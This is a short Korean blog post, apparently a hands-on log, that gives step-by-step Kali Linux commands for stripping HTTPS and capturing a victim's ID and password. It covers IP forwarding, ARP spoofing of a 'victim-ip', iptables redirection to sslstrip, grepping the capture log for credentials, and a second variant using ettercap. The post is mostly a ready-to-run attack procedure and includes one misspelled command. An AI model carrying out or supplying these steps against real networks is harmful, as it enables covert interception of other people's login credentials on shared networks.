kali sslstrip을 이용한 HTTPS 도청

이번에는 sslstrip을 이용하여 id, pw를 가로채는 것을 해보겠다.

SSLStrip 공격이란?

- HTTPS 통신 과정에서 https -> http 로 변경하여 암호화 통신을 방해함

- 동일한 NW환경 혹은 피해자의 트래픽을 수집할 수 있는 환경이어야 함

1) arp spoofing : 사용자의 패킷 -> 공격자

2) 사용자의 패킷이 라우팅이 되도록 ip_forward

3) sslstrip 공격 수행

(http://www.iblue.kr/xe/index.php?document_srl=116044&mid=board_OSMt72 발췌)

1. ip_forward가 가능하도록 설정

#echo 1 > /proc/sys/net/ipv4/ip_forward

2. arpspoofing 작동

#arpspoof -t victim-ip gw-ip

3. iptables rule 설정

#iptables --flush

#iptables -t nat -A PREROUTING -p tcp

   --destination-port 80 -j REDIRECT

   --to-ports 8080                               //위에는 port 밑에는 ports 주의

sslstrip 작동시키기

이번에도 역시 사이트는 공개하지 않기로 한다.

희생자가 해당 사이트에 접속하여 id와 pw를 입력할 경우

아래의 화면을 확인할 수 있다.

#cat sslstrip.log | grep -a id값(또는 pass)

다음으로는 ettercap을 이용한 HTTPS 도청 방법이다.

1. /etc/ettercap/etter.conf 수정        (http://kkn1220.tistory.com/32 참고)

2. enable ip_forward

#echo 1 > /proc/sys/net/ipv4/ip_forward

3. arpspoof 실행

#arpsppof -t victim_ip gw_ip

4. iptables_rules 설정

#iptables --flush

#iptables -t nat -A PREROUTING -p tcp

  --destination-port 80 -j REDIRECT

  --to-ports 10000

5. sslstrip 실행

#sslstrip -a -k -f

6. ettercap 가동

#ettercap -T -q -i eth0

7. 희생자는 사이트 접속 후 id, pw 입력

역시 이 또한 가능하다는 것을 확인해 볼 수 있다.

네이x, goox, 다x 등 대형 포털사이트는 막힘

2016-02-03